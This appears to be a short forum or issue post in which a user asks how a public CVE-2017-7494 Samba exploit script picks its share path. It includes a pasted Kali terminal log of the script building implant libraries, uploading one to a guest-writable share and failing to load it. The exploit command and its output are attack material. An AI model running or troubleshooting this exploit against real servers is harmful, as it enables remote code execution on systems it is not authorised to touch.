how does this determine the full path?

[chppppp]

I am trying to use this exploit against a samba 3.5.11 server but it's not working out of the box. The writable share is called /test and this exploit is trying to use the full path /usr/local/samba/tmp/. I am going through the source but thought it might be useful to ask directly how this exploit is determining this path.

Thank you!

root@kali:/CVE-2017-7494# python cve_2017_7494.py -t 10.11.1.129 [Sun Dec 16 10:21:39 2018] Building libraries... gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx64.so gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32 [Sun Dec 16 10:21:39 2018] Logging into the Samba server 10.11.1.129:445 [Sun Dec 16 10:21:40 2018] Using a GUEST session [Sun Dec 16 10:21:40 2018] Using libimplantx64.so [Sun Dec 16 10:21:40 2018] Trying to copy library 'T1XOvrsK.so' to share '[u'test', u'/usr/local/samba/tmp']' [Sun Dec 16 10:21:41 2018] Done! [Sun Dec 16 10:21:41 2018] Trying to copy random library T1XOvrsK.so [Sun Dec 16 10:21:41 2018] Trying to load module /usr/local/samba/tmp/T1XOvrsK.so [Sun Dec 16 10:21:41 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)